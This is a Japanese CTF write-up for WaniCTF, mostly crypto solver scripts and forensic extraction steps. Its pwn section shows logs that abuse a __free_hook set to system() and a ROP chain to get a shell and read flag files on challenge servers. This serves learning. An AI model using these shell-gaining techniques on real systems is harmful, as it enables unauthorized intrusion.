この大会は2019/4/30 10:00(JST)~2019/5/2 20:00(JST)に開催されました。
この大会は個人戦。結果は4651点で450人中31位でした。
非常に残念。もう少し上位に行きたかった。
スコアのカテゴリごとの分布はこんな感じ。やはりPwn, Webが弱いか。
あとで他の人のWriteupを見ると、こんなことかという問題もあったが、それに気づかなかったこととか、やってみなかったことを反省です。
自分の解けた問題をWriteupとして書いておきます。
Simple conversion (Crypto)
int.from_bytesでフラグ文字列が数値になっているだけなので、数値を文字列化してフラグ文字列に戻す。
#!/usr/bin/python3 with open('output.txt', 'r') as f: enc = int(f.read()) flag = enc.to_bytes((enc.bit_length() + 7) // 8, 'big') print(flag)
FLAG{7h1s_i5_h0w_we_c0nvert_m3ss@ges_1nt0_num63rs}
Easy (Crypto)
Affine cipherのコードのようだ。A, Bの値をブルートフォースして復号する。
#!/usr/bin/python3 from Crypto.Util.number import * def decrypt(ciphertext: str, a: int, b: int) -> str: plaintext = '' for x in ciphertext: if 'A' <= x <= 'Z': x = ord(x) - ord('A') x = ((x - b) * inverse(a, 26)) % 26 x = chr(x + ord('A')) plaintext += x return plaintext with open('output.txt', 'r') as f: enc = f.read().rstrip() found = False for a in range(26): for b in range(26): flag = decrypt(enc, a, b) if flag.startswith('FLAG'): found = True print(flag) break if found: break
FLAG{WELCOMETOCRYPTOCHALLENGE}
Can't restore the flag? (Crypto)
サーバは、フラグを指定の数値で割った余りの数値を表示する。2以上300以下で試し、CRTによりflagを求める。
import socket from sympy.ntheory.modular import crt from Crypto.Util.number import long_to_bytes def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('crt.cry.wanictf.org', 50000)) mod_list = [] rem_list = [] for mod in range(2, 301): data = recvuntil(s, '> ') print data + str(mod) s.sendall(str(mod) + '\n') data = recvuntil(s, '\n').rstrip() print data mod_list.append(mod) rem_list.append(int(data)) flag = crt(mod_list, rem_list)[0] flag = long_to_bytes(flag) print(flag)
実行結果は以下の通り。
Mod > 2
0
Mod > 3
2
Mod > 4
2
:
Mod > 297
65
Mod > 298
56
Mod > 299
293
Mod > 300
290
FLAG{Ch1n3s3_r3m@1nd3r_7h30r3m__so_u5eful}
FLAG{Ch1n3s3_r3m@1nd3r_7h30r3m__so_u5eful}
Extra (Crypto)
RSA暗号だが、Mの値 (M = 2 * p + q) もわかっている。わかっていることから式を変形する。
q = M - 2 * p N = p * q = p * (M - 2 * p) = - 2 * p**2 + M * p
このことから、以下の方程式を解けばpがわかり、qもわかる。
2 * p**2 - M * p + N = 0
あとはそのまま復号すればよい。
from sympy import * from Crypto.Util.number import * with open('output.txt', 'r') as f: N = int(f.readline().rstrip().split(' ')[-1]) M = int(f.readline().rstrip().split(' ')[-1]) e = int(f.readline().rstrip().split(' ')[-1]) c = int(f.readline().rstrip().split(' ')[-1]) p = Symbol('p') eq = Eq(2 * p**2 - M * p + N) ans = solve(eq) for p in ans: if type(p) == Integer: p = int(p) break q = N / p assert N == p * q phi = (p - 1) * (q - 1) d = inverse(e, phi) m = pow(c, d, N) flag = long_to_bytes(m) print flag
FLAG{@n_ex7ra_param3ter_ru1n5_3very7h1n9}
OUCS (Crypto)
サーバのコードから、通常のOkamoto–Uchiyama cryptosystemで、4つの選択肢から選択すると、対応する処理をして表示をすることがわかる。この暗号では、Enc(a + b) = Enc(a) * Enc(b) になることから、Enc(flag) * Enc(flag) = Enc(flag * 2)になる。このことを使って、復号する。
import socket from Crypto.Util.number import long_to_bytes def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('oucs.cry.wanictf.org', 50010)) data = recvuntil(s, '> ') print data + '4' s.sendall('4\n') data = recvuntil(s, '\n').rstrip() print data n = eval(data.split(' = ')[1]) data = recvuntil(s, '> ') print data + '1' s.sendall('1\n') data = recvuntil(s, '\n').rstrip() print data flag_enc = eval(data.split(' = ')[1]) c = pow(flag_enc, 2, n) data = recvuntil(s, '> ') print data + '3' s.sendall('3\n') data = recvuntil(s, '> ') print data + str(c) s.sendall(str(c) + '\n') data = recvuntil(s, '\n').rstrip() print data m = eval(data.split(' = ')[1]) m = m / 2 flag = long_to_bytes(m) print flag
実行結果は以下の通り。
.oooooo. ooooo ooo .oooooo. .oooooo..o
d8P' `Y8b `888' `8' d8P' `Y8b d8P' `Y8
888 888 888 8 888 Y88bo.
888 888 888 8 888 `"Y8888o.
888 888 888 8 888 `"Y88b
`88b d88' `88. .8' `88b ooo oo .d8P
`Y8bood8P' `YbodP' `Y8bood8P' 8""88888P'
╭─────────────────────╮
│ 1. Encrypt flag │
│ 2. Encrypt │
│ 3. Decrypt │
│ 4. Show public key │
│ 5. Exit │
╰─────────────────────╯
> 4
n = 0x91fa8c5293fd52c9e84437f64b8aebd95ac9fea83a8f5b648ee6f90889fd9143e200e5825812a229d862922d81035f0dc0633c5d0ecaf0ad450dc169f0415c5a374407e29771bae86edb5e1d6ded87da4657be393fccb69853c1dd5649dd2e067e12edd35d8cffef24a3cd20c4a512c7f4f2164b920619599806bf1675ebccc6d14f1c6df0c7bd7e16acd58bd6f06695572760ca9ed85c331b072fe9a32cf3b0c1555bf20e9e28cfac54f1b1da4912f89806391b603a0ce4b9e9f9c85a1bdec99868e67322c29b70f269e327a2dfaae31ec7d258ad68fdf98a08edcd6274f6563a947c63111cc5bf83fc0784a8608df38eccfb3e3b082ce8f67f894bfac66f9646631d51de783407e14bcbaeff2aaa741923d045d4c909a7fc2ec9fd504e14918837304204ded0e897f6cc56d26cfe6f50712439d7b77842b5f250a51632eb3219b4b372bbf4660b77df742f30c48a4969095f8b07eebd9264d238c26feedb8e7f4171ea21ce33bee5a5c59a48ee5f573ad8be4d0649a33062fd0d2775c44bdf
g = 0x58da84ccd9b88a939e780b265ab615d98443e1b6a4f4ec70ef9fa3a75056806f1045b68621d6174c673938af61313d90c5e008186d450a2cdf745e087704ffc7d92c5c6e72ead1269c646845153edb3e2cd7cfc55a58cbb661e8d692539d1d882c3605f73afe2f4e3638f14c215890402683f12741d33724fc7d6490217ea15b38507407b414ce09649c2d671b4e6a609153532533a4eb717522a5a5368f040af0c58594afb4c23de02cb6e901b743c715e06d8cae7439b475ab527f5a8268ea5ba681dc08ccd6b90ecdd06edb42452a6120c147193e6ee700fba7e846a31e66810f0381ef5271f4b13816b668c81f6920b756e327fc77199af53e2ff7c1259203c7292219705100c33d7e33035c9dd727dda30e21467b40160884eb871e27ea70dfed1e408b125c71c24eb71b84cf3b96c71b80c23f9bc783c30952ade8bdb9b8eaabf007709f2bbc89b68ff659da624ac7099dfd7a4af4969a1a95b4dfc2dc13cb61f24e02e67e16f3887bcd03b0d3eaa62df005e3bc1007bbac503671d18
h = 0x59f2dbdae465c14f45d62e0a681e80284b6e903332375df321801ff86d9d4a3680fad61b3e825dd2cab7bfce88663a60635b53298e65957587d6a3d22f2494124c77e0c32006806fa27ef6f3c24ed9dd2c9f6657aec465772a4babe0c4be27c0267a9400c5f1f2e46552e128b81b0491545900e594cabc4d2f3f60018d23d48d07c866f51d91d8f5aff7f12110ca7200dccb72f26c59311cd02dc40ffce426f92c674ad85039ac7904ec5fb0c025903eeb94d53ca2bf6a0421d79543c72b27e9f431409bc9508e3f59ad91fe223b43e5c57afbe08e10c05d75e7ad15541b5fa000c1be457d820cc6c2ccda70c3f2640e340d8deecc821a382303c2e638b013e8d4248a80c888d530946fa35b8fedeb9a8b63ac432bcbec39c26e38e382ff09b18b6199def31c152e04031ebd9192ef5cc961b580aa74872e17d910c1aed3e2522f338720d71b412bf5968dad7a3214fa2a243aa5b6ba3fe84bc2c7cf24afa98447eccbd0d1221a92f152c9096842001dad8507da1f1c4fa5ed6d1608d1732d34
╭─────────────────────╮
│ 1. Encrypt flag │
│ 2. Encrypt │
│ 3. Decrypt │
│ 4. Show public key │
│ 5. Exit │
╰─────────────────────╯
> 1
ciphertext = 0x33f3e42d5ffceb31473a03feabe574b6209005eeeac2142756a1d06fc002d2d30a2a366c86e322e39852d777a5251858a7d197d5b93d672a37c09930af76053060ac6d06275112c0f2892d0b3b634e670c0b9f45b4deacf0eddc1161b31798bc3c8024a00459cd0ec1c69b751357fb8ad625a83c91ca7b2eae9e81f2c9badfe300441c58f861b5ed7472bca50b86999638a7da8b0956661c168f467567e741c622186c103838a8f8d51276e4a247823214fd7b2cd95c3bcb64693f291e1d324e255e824655e94fddae751c09bca99e71d9c69e58ec0cffad5515992a362d756661c2ef3b34fac50db2c3c1c700960312d169e5fa92ba3b00b2e6bfb7938e1dfdbee52cb2dc4c4f3d61ac1498318be999a4e5da53e20e97e754df7ccfe1f8971ea676239e4b5a304f546c2db8d7b9573bfa1a838e18e65a6df7b1ed16c7175cad82023253539e83e14cfcae2b4d34ac308e80e3c7787568c386a12c869c22e40683f743661514e9618eb9bf599a692a76d3502616a83019d490c07beef40eabf3
╭─────────────────────╮
│ 1. Encrypt flag │
│ 2. Encrypt │
│ 3. Decrypt │
│ 4. Show public key │
│ 5. Exit │
╰─────────────────────╯
> 3
Enter your ciphertext
> 972502408448353733722317501707311270567983254039876442607508119290611415301354130975690806304957275839049056511537564462169539550781353847251487955524001806208733683164616063161142591094650455415772105150298335959838639695103265543469663771476737545866023727163036821109449829188994769485495428515699559938683253328177410152110422109983126644966297670856790946955820334738120411921636741917740481195949951986513315901493776931936120646265522877321494961812836019797491478649109283951720896092842745779316624271453851315233640772276708106770785351611010554556116226991209979276968069712968404732384082770663418993425145805207348541130113867933154005943584952915342553770635138425308016438617088978537389674219007308106481297071241786104337345579938848904582114590904489584988433401027544524232677022451052518355762996080450703429677781999427311046256151338108546732373191614424875540283736944546830720280634452838877435446613
plaintext = 0x8c98828ef69eaabec860cae6bedc60e8bee4cae0e4ca6a66dce8be9ee6c2d6c2beaadcd2eccae4e6d2e8f2bec4eae8be9ed6c2dadee8de5aaac6d0d2f2c2dac2fa
FLAG{OU_d0es_n0t_repre53nt_Osaka_University_but_Okamoto-Uchiyama}
FLAG{OU_d0es_n0t_repre53nt_Osaka_University_but_Okamoto-Uchiyama}
presentation (Forensics)
ppsxが添付されていて、このファイルを開いてみるが、「FLAG{xxx}」のxxxがマスクされていてわからない。zip解凍して、\presentation\ppt\slides\slide1.xmlを見ると、FLAG{}の中身がわかる。
FLAG{you_know_how_to_edit_ppsx}
secure document (Forensics)
flag_20210428.zipというパスワード付きzipと、以下の内容がかいてある password-generator というファイルが添付されている。
::the::
Send, +wani
return
::password::
Send, +c+t+f
return
::for::
Send, {home}{right 3}{del}1{end}{left 2}{del}7
return
::today::
FormatTime , x,, yyyyMMdd
SendInput, {home}{right 4}_%x%
return
::is::
Send, _{end}{!}{!}{left}
return
:*?:ni::
Send, ^a^c{Esc}{home}password{:} {end}
return"SendInput"や"FormatTime"など調べてみたら、AutoHotKeyのコマンドになっている。http://ahkwiki.net/Sendなどを参考にする。問題には以下のように書いてあるので、そのように打鍵したときにどう出力されるのかを順を追って考える。
the password for today is nani
["the"完了時] Wani ["password"完了時] WaniCTF ["for"完了時] Wan1C7F ["today"完了時] Wan1_20210428C7F ["is"完了時] Wan1_20210428_C7F!! ["nani"完了時] password: Wan1_20210428_C7F!na!
このパスワードでflag_20210428.zipを解凍すると、flag.jpgが展開される。この画像ファイルにフラグが書いてあった。
FLAG{Nani!very_strong_password!}
slow (Forensics)
wavが添付されているので、Audacityで見てみる。
平坦に見える波形で、wavの画像受信データがありそうなので、sstvのツールでデコードしてみる。
$ sstv -d slow.wav -o flag.png [sstv] Searching for calibration header... Found! [sstv] Detected SSTV mode Martin 1 [sstv] Decoding image... [#############################################] 100% [sstv] Drawing image data... [sstv] ...Done!
画像を見たら、フラグが書いてあった。
FLAG{encoded_by_slow-scan_television}
illegal image (Forensics)
裏で画像データをやり取りしていると問題にあることからICMPの通信に隠されていると推測する。ICMP通信を見ると、JPEGデータが送信されているのがわかったので、取り出し結合する。
from scapy.all import * packets = rdpcap('illegal_image.pcap') flag = '' for p in packets: if p.haslayer(ICMP) and p[ICMP].type == 0: flag += p[Raw].load with open('flag.jpg', 'wb') as f: f.write(flag)
画像にフラグが書いてあった。
FLAG{ICMP_Exfiltrate_image}
binary (Misc)
サンプルコードは"WANI"という文字列をbit文字列にして表示後、元に戻して表示している。元に戻すコードもあるので、それを使って元に戻す。
#!/usr/bin/python3 with open('binary.csv', 'r') as f: bits = [int(bit) for bit in f.read().rstrip().split('\n')] s = '' c = 0 for i in range(len(bits)): val = int(bits[i]) c = (c << 1) | val if i % 8 == 7: s = s + chr(c) c = 0 print(s)
FLAG{the_basic_knowledge_of_communication}
Git Master (Misc)
Dokerのイメージを配布しているURLが提示されている。イメージからコンテナを構築し、入ってみる。
$ sudo docker pull wanictf21spring/nginx_on_ubuntu Using default tag: latest latest: Pulling from wanictf21spring/nginx_on_ubuntu a70d879fa598: Pull complete c4394a92d1f8: Pull complete 10e6159c56c0: Pull complete 0ff2c7c262e9: Pull complete 3ca67b0aea04: Pull complete Digest: sha256:2f26ab46d70e32b71811700c68beb7a7d9ef6041f90bab205c81ac52699c51fc Status: Downloaded newer image for wanictf21spring/nginx_on_ubuntu:latest docker.io/wanictf21spring/nginx_on_ubuntu:latest $ sudo docker run -dit --name gitmaster -p 80:80 wanictf21spring/nginx_on_ubuntu:latest bbaa6aa613998b55feaf6d724ad0292583e030b75af3e82ebae73cab8a2db4f8 $ sudo docker exec -it gitmaster /bin/bash root@bbaa6aa61399:/var/www# cd html root@bbaa6aa61399:/var/www/html# ls -la total 52 drwxr-xr-x 1 root root 4096 Apr 13 04:39 . drwxr-xr-x 1 root root 4096 Apr 13 04:57 .. -rw-r--r-- 1 root root 10 Apr 13 04:39 Flag.txt drwxr-xr-x 6 root root 4096 Apr 13 01:07 assets -rw-r--r-- 1 root root 17542 Apr 13 01:07 favicon.ico -rw-r--r-- 1 root root 9365 Apr 13 00:01 index.html -rw-r--r-- 1 root root 612 Apr 13 02:17 index.nginx-debian.html root@bbaa6aa61399:/var/www/html# cat Flag.txt FLAG{y0u_
フラグの断片があった。
root@bbaa6aa61399:/var/www/html# cd .. root@bbaa6aa61399:/var/www# ls -la total 32 drwxr-xr-x 1 root root 4096 Apr 13 04:57 . drwxr-xr-x 1 root root 4096 Apr 13 02:17 .. drwxr-xr-x 8 root root 4096 Apr 13 04:39 .git -rw-r--r-- 1 root root 181 Apr 13 04:39 Dockerfile -rw-r--r-- 1 root root 95 Apr 13 04:39 docker-compose.yml drwxr-xr-x 1 root root 4096 Apr 30 14:47 html
.gitディレクトリがあったので、ローカルに転送するためにアーカイブにする。
root@bbaa6aa61399:/var/www# tar cvf html/git.tar ./.git ./.git/ ./.git/branches/ ./.git/info/ ./.git/info/exclude ./.git/objects/ ./.git/objects/44/ ./.git/objects/44/702362495fe66f887448f98bc0b5d6be503efb ./.git/objects/08/ ./.git/objects/08/2edd4e7b973fe74e0a2c21b14d52ce95517330 ./.git/objects/a2/ ./.git/objects/a2/fed4a4a6a1d608e43d0e18968666e6cb235526 ./.git/objects/8d/ ./.git/objects/8d/d61184bf3d290085c43d541865bc2fe2a60844 ./.git/objects/51/ ./.git/objects/51/1bb8eac45d3f039e2ab5eec36ce8dd687f5d63 ./.git/objects/f4/ ./.git/objects/f4/fff0471d0d6521eb609d30f760a298cd9541f9 ./.git/objects/c8/ ./.git/objects/c8/d70ab0fd2520d5530468ac8a007954f1052ad9 ./.git/objects/45/ ./.git/objects/45/5b47a724881078a55e9cf145b49c4d847ef9f4 ./.git/objects/ef/ ./.git/objects/ef/189e042918048fad826998ed2ff17e56654eb4 ./.git/objects/a4/ ./.git/objects/a4/634183951546581a0d2735d85f21a419dc0c72 ./.git/objects/77/ ./.git/objects/77/a56b2b0e0275d772199fdc1b07102e27aede11 ./.git/objects/64/ ./.git/objects/64/a9f8c7602cfcc5dfef19d8a18828779cc05d3f ./.git/objects/c0/ ./.git/objects/c0/ac3406b60ce14584dbef504293f429a7a102e3 ./.git/objects/c0/a94e2c012291136cccebdd0b357b26a3f63aa5 ./.git/objects/35/ ./.git/objects/35/1090df79c57012ab2712901728d32b0594a69a ./.git/objects/35/ae69523d6f97cbadebe413def050adb547e35a ./.git/objects/14/ ./.git/objects/14/a76c6030cf11b6241f0df80480ce5cdf3db695 ./.git/objects/69/ ./.git/objects/69/19be129dd806595762632b6ca24ebab8fe593e ./.git/objects/4c/ ./.git/objects/4c/0f80e390ddfa7c58914a4d2e4863788c23c415 ./.git/objects/70/ ./.git/objects/70/157c02757232ae17be60459945acd920f2b538 ./.git/objects/b4/ ./.git/objects/b4/1601462b20845f9e0680fa77ebccd2cf42fe7c ./.git/objects/info/ ./.git/objects/fe/ ./.git/objects/fe/2ed860f4ccf421ff9316e614128de5fea7ade3 ./.git/objects/b3/ ./.git/objects/b3/d46d127fce3c8c3d2cb8a234a6d3f7bb8bbcaf ./.git/objects/3a/ ./.git/objects/3a/614b08e15c6fc282376f13b825ad0652f58cf8 ./.git/objects/d4/ ./.git/objects/d4/c4bca3f2dc59ae22a76308c01700a2786de3cd ./.git/objects/d4/3a3b21ce5236a1b8937fd149ec9514751fb1a2 ./.git/objects/aa/ ./.git/objects/aa/8cfc4b21158aa896f1676f44f675eba1067210 ./.git/objects/6e/ ./.git/objects/6e/7b9d9c4fab5ef27ede4568f557b0dff4e1b3ae ./.git/objects/42/ ./.git/objects/42/8833073ab18a3890a89de8c8066969baa0a295 ./.git/objects/2b/ ./.git/objects/2b/a1903e57dd6f37d64f195c43fe6d73abb6725b ./.git/objects/2b/fd1c362f310a7fbb2be6fd3546819d456b4499 ./.git/objects/6a/ ./.git/objects/6a/784d9649db84ce32196cfc5091303a87042467 ./.git/objects/f1/ ./.git/objects/f1/43641105c1de6e660ca2f71b85b1eea2cb49a1 ./.git/objects/73/ ./.git/objects/73/7f9d108236e05f619c40963e92285bb643663a ./.git/objects/a1/ ./.git/objects/a1/97abfccd60d55469f62622796897f9ee891f18 ./.git/objects/4d/ ./.git/objects/4d/44f68a4f1e7fedf2c7962be92a9a28b9bb4868 ./.git/objects/95/ ./.git/objects/95/9a27def1ad3d80095b73cb2ff262100212497a ./.git/objects/d9/ ./.git/objects/d9/868ef339a2c7d8d9975cdd549101081649f89d ./.git/objects/92/ ./.git/objects/92/84d6d93b19e5b2ae3ea963138fe08157d4e3fa ./.git/objects/60/ ./.git/objects/60/ca0b1f76d898f5c11a381592d5c37385bebea8 ./.git/objects/60/f12b5453bbc53db87ac77d580361c0b1993c77 ./.git/objects/1f/ ./.git/objects/1f/c314c2c56d52bd2381d98c0a59ea8a8deeed6b ./.git/objects/e2/ ./.git/objects/e2/599825e618a7978ff3ed2f20b0bc33ef216f6d ./.git/objects/0b/ ./.git/objects/0b/c052a041629b6b33a6b675b7b705727cf2b2ba ./.git/objects/05/ ./.git/objects/05/8a5020310afc637ee59cf3dfc371d2be91b4d0 ./.git/objects/94/ ./.git/objects/94/087f63576bee2a81dc315efd864a01f2da0897 ./.git/objects/9f/ ./.git/objects/9f/79020f7c87498b2c31631320a819b6ce5f7db8 ./.git/objects/9f/578c697df49ea14e2887b1eef7d5b0d47bfc58 ./.git/objects/dc/ ./.git/objects/dc/47e3a0eb6537174801f7223ef27315ab37ae2c ./.git/objects/f9/ ./.git/objects/f9/9f791c31212b6663f3f5d3e29b7caf8dac887e ./.git/objects/ae/ ./.git/objects/ae/26825ee9c437fd3b7fcddcd5ccea9545f7389e ./.git/objects/8b/ ./.git/objects/8b/3b277314f0791fbab20b30df2c898c7ddf6644 ./.git/objects/ee/ ./.git/objects/ee/2ff0e832bb3b55b67365897f837678964bba11 ./.git/objects/6c/ ./.git/objects/6c/c0b29f5ce571d1a1e36b43d91681dbae7c22aa ./.git/objects/e4/ ./.git/objects/e4/c9da8d153ceb2efdc7521ac71d522ca7ca5fb7 ./.git/objects/f0/ ./.git/objects/f0/07f269599e168777f376e71d5d84020f3bbbaf ./.git/objects/cb/ ./.git/objects/cb/29ddc5d574be325a2485fbb71bc1f00ce7208c ./.git/objects/cb/6f48aff726e3a861bce276c654140136ab40ce ./.git/objects/cb/2205c8960db8cb7bd6dcc31a5d00fde863f8f4 ./.git/objects/pack/ ./.git/objects/4a/ ./.git/objects/4a/182be10739fa02222e2502870637bd3126a1fb ./.git/objects/1b/ ./.git/objects/1b/5bfaf9a29aff8173115b388e097765d9563252 ./.git/objects/7a/ ./.git/objects/7a/3aa17c3ef5b0aa44f1f465444d904f9d67082d ./.git/objects/49/ ./.git/objects/49/ceff2ab5d8e556a73c6cc2ebd5435559d83bbf ./.git/objects/03/ ./.git/objects/03/63feb595d0b1e45d95c12df2d1705fbb71f0bd ./.git/objects/03/8e7a9db5adf5356ec2dadfbff45d0a2127e1f0 ./.git/objects/d5/ ./.git/objects/d5/6105569614e51c85ceb1a32994bf4711418439 ./.git/objects/79/ ./.git/objects/79/c413edb2d73bad622242e1644709f70b5da3d2 ./.git/refs/ ./.git/refs/tags/ ./.git/refs/original/ ./.git/refs/heads/ ./.git/refs/heads/master ./.git/refs/heads/temporary ./.git/ORIG_HEAD ./.git/HEAD ./.git/index ./.git/hooks/ ./.git/hooks/pre-applypatch.sample ./.git/hooks/update.sample ./.git/hooks/pre-rebase.sample ./.git/hooks/pre-merge-commit.sample ./.git/hooks/pre-receive.sample ./.git/hooks/fsmonitor-watchman.sample ./.git/hooks/prepare-commit-msg.sample ./.git/hooks/pre-push.sample ./.git/hooks/applypatch-msg.sample ./.git/hooks/commit-msg.sample ./.git/hooks/pre-commit.sample ./.git/hooks/post-update.sample ./.git/description ./.git/logs/ ./.git/logs/refs/ ./.git/logs/refs/heads/ ./.git/logs/refs/heads/master ./.git/logs/refs/heads/temporary ./.git/logs/HEAD ./.git/COMMIT_EDITMSG ./.git/config
ローカルに戻って、作成したtarをダウンロードし、解凍する。いろいろオブジェクトを確認していく。
$ python -c 'import zlib; print zlib.decompress(open("objects/ae/26825ee9c437fd3b7fcddcd5ccea9545f7389e").read())' | xxd -g 1 00000000: 74 72 65 65 20 31 34 36 00 31 30 30 36 34 34 20 tree 146.100644 00000010: 46 6c 61 67 2e 74 78 74 00 ef 18 9e 04 29 18 04 Flag.txt.....).. 00000020: 8f ad 82 69 98 ed 2f f1 7e 56 65 4e b4 34 30 30 ...i../.~VeN.400 00000030: 30 30 20 61 73 73 65 74 73 00 2b fd 1c 36 2f 31 00 assets.+..6/1 00000040: 0a 7f bb 2b e6 fd 35 46 81 9d 45 6b 44 99 31 30 ...+..5F..EkD.10 00000050: 30 36 34 34 20 66 61 76 69 63 6f 6e 2e 69 63 6f 0644 favicon.ico 00000060: 00 73 7f 9d 10 82 36 e0 5f 61 9c 40 96 3e 92 28 .s....6._a.@.>.( 00000070: 5b b6 43 66 3a 31 30 30 36 34 34 20 69 6e 64 65 [.Cf:100644 inde 00000080: 78 2e 68 74 6d 6c 00 6e 7b 9d 9c 4f ab 5e f2 7e x.html.n{..O.^.~ 00000090: de 45 68 f5 57 b0 df f4 e1 b3 ae 0a .Eh.W....... $ python -c 'import zlib; print zlib.decompress(open("objects/ef/189e042918048fad826998ed2ff17e56654eb4").read())' blob 9_m45t3r}
$ python -c 'import zlib; print zlib.decompress(open("objects/c8/d70ab0fd2520d5530468ac8a007954f1052ad9").read())' | xxd -g 1 00000000: 74 72 65 65 20 31 34 36 00 31 30 30 36 34 34 20 tree 146.100644 00000010: 46 6c 61 67 2e 74 78 74 00 f9 9f 79 1c 31 21 2b Flag.txt...y.1!+ 00000020: 66 63 f3 f5 d3 e2 9b 7c af 8d ac 88 7e 34 30 30 fc.....|....~400 00000030: 30 30 20 61 73 73 65 74 73 00 2b fd 1c 36 2f 31 00 assets.+..6/1 00000040: 0a 7f bb 2b e6 fd 35 46 81 9d 45 6b 44 99 31 30 ...+..5F..EkD.10 00000050: 30 36 34 34 20 66 61 76 69 63 6f 6e 2e 69 63 6f 0644 favicon.ico 00000060: 00 73 7f 9d 10 82 36 e0 5f 61 9c 40 96 3e 92 28 .s....6._a.@.>.( 00000070: 5b b6 43 66 3a 31 30 30 36 34 34 20 69 6e 64 65 [.Cf:100644 inde 00000080: 78 2e 68 74 6d 6c 00 6e 7b 9d 9c 4f ab 5e f2 7e x.html.n{..O.^.~ 00000090: de 45 68 f5 57 b0 df f4 e1 b3 ae 0a .Eh.W....... $ python -c 'import zlib; print zlib.decompress(open("objects/f9/9f791c31212b6663f3f5d3e29b7caf8dac887e").read())' blob 164r3_p3rf3c7_g1t
Flag.txtの編集履歴から見つけた文字列を結合する。
FLAG{y0u_4r3_p3rf3c7_g1t_m45t3r}
Automaton Lab (Misc)
Rule30のルールに従って、Q1, Q2はそのまま答える。Q3は非常に大きいが、途中でループになるはずなので、ループのサイクルを割り出し、そのインデックスを求め、答える。
import socket def recvuntil(s, tail): data = '' while True: if tail in data: return data data += s.recv(1) def get_next_str(s): dic = {'111': '0', '110': '0', '101': '0', '100': '1', '011': '1', '010': '1', '001': '1', '000': '0'} d = '' for i in range(len(s)): t = s[i-1] + s[i] + s[(i+1)%len(s)] d += dic[t] return d s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('automaton.mis.wanictf.org', 50020)) data = recvuntil(s, ')\n').rstrip() print data s.sendall('\n') data = recvuntil(s, '> ') print data[:-1], automaton = data.split('\n')[-3].split(' ')[-1] gen = int(data.split('\n')[-2].split(' ')[-1]) for i in range(gen): automaton = get_next_str(automaton) print automaton s.sendall(automaton + '\n') data = recvuntil(s, '> ') print data[:-1], automaton = data.split('\n')[-3].split(' ')[-1] gen = int(data.split('\n')[-2].split(' ')[-1]) for i in range(gen): automaton = get_next_str(automaton) print automaton s.sendall(automaton + '\n') data = recvuntil(s, '> ') print data[:-1], automaton = data.split('\n')[-3].split(' ')[-1] gen = int(data.split('\n')[-2].split(' ')[-1]) answers = [automaton] for i in range(2**15): automaton = get_next_str(automaton) if automaton not in answers: answers.append(automaton) else: index = answers.index(automaton) print index break answers = answers[index:] cycle_len = len(answers) automaton = answers[((gen - index) % cycle_len)] print automaton s.sendall(automaton + '\n') data = recvuntil(s, '\n').rstrip() print data data = recvuntil(s, '\n').rstrip() print data
実行結果は以下の通り。
Welcome to Automaton Lab.!
We study about automaton in there, here is the space of "Rule 30"[1] automaton.
We breed 15 cells automaton now, they are ring-connected -- they are connected the first cell and the last cell.
Our interest is what this cute automaton grow up in future, we want your help to expect their growth.
[1]: https://en.wikipedia.org/wiki/Rule_30
For example, now automaton state is "100000100000001" ('1' is alive and '0' is dead) and in next generation they are "010001110000011".
generation state
0 100000100000001
1 010001110000011
2 011011001000110
We give you initial state(init) and generation(gen). You write down the state of this automaton of the nth generation in binary.
Are you ready?
(press enter key to continue)
OK! Here we go! The first question is warming up.
init = 011101010111100
gen = 7
> 110010111001000
Great! The second question is below.
init = 000110000000000
gen = 997
> 101011110101111
Even if human become extinct, we wanna see the view of prosperity of cell automaton. This is last question.
init = 000000000000001
gen = 126398516620674013019848789864125130087754056459005394082216364042030884420341986809725135763853530970927817015726724392576100867235130072915186626915539006159827017021536585317153119779669735542196802036197311048258357232726626315375252420455232968913174748940431822360827924726272991102219461489407251273261
> 47
011110110000001
Jesus!!! Are you the genius of future sight? We award you the special prize.
FLAG{W3_4w4rd_y0u_d0c70r473_1n_Fu7ur3_S1gh7}
FLAG{W3_4w4rd_y0u_d0c70r473_1n_Fu7ur3_S1gh7}
01 netcat (Pwn)
ncで接続するだけ。
$ nc netcat.pwn.wanictf.org 9001 congratulation! please enter "ls" command ls chall flag.txt redir.sh cat flag.txt FLAG{this_is_the_same_netcat_problem_as_previous_one}
FLAG{this_is_the_same_netcat_problem_as_previous_one}
02 free hook (Pwn)
__free_hookにsystem関数が設定されている。freeでメモリ開放するデータが__free_hookに渡されるので、memoとして実行したいコマンドを登録して、削除するようにすれば、指定したコマンドを実行できる。
$ nc free.pwn.wanictf.org 9002 1: add memo 2: view memo 9: del memo command?: 1 index?[0-9]: 0 memo?: ls [[[list memos]]] ***** 0 ***** ls 1: add memo 2: view memo 9: del memo command?: 9 index?[0-9]: 0 chall flag.txt redir.sh [[[list memos]]] 1: add memo 2: view memo 9: del memo command?: 1 index?[0-9]: 0 memo?: cat flag.txt [[[list memos]]] ***** 0 ***** cat flag.txt 1: add memo 2: view memo 9: del memo command?: 9 index?[0-9]: 0 FLAG{malloc_hook_is_a_tech_for_heap_exploitation} [[[list memos]]] 1: add memo 2: view memo 9: del memo command?:
FLAG{malloc_hook_is_a_tech_for_heap_exploitation}
03 rop machine easy (Pwn)
問題によれば、"/bin/sh"のアドレスは提供されているので、system("/bin/sh")を実行できればよい。
$ nc rop-easy.pwn.wanictf.org 9003 "/bin/sh" address is 0x404070 [menu] 1. append hex value 2. append "pop rdi; ret" addr 3. append "system" addr 8. show menu (this one) 9. show rop_arena 0. execute rop > 2 "pop rdi; ret" is appended > 1 hex value?: 0x404070 0x0000000000404070 is appended > 3 "system" is appended > 9 rop_arena +--------------------+ | pop rdi; ret |<- rop start +--------------------+ | 0x0000000000404070 | +--------------------+ | system | +--------------------+ > 0 rop_arena +--------------------+ | pop rdi; ret |<- rop start +--------------------+ | 0x0000000000404070 | +--------------------+ | system | +--------------------+ ls chall flag.txt redir.sh cat flag.txt FLAG{this-is-simple-return-oriented-programming}
FLAG{this-is-simple-return-oriented-programming}
04 rop machine normal (Pwn)
rdiは"/bin/sh"のアドレス、rsi, rdxは0、raxはexecveのsyscall番号を指定して、syscallを実行できればよい。
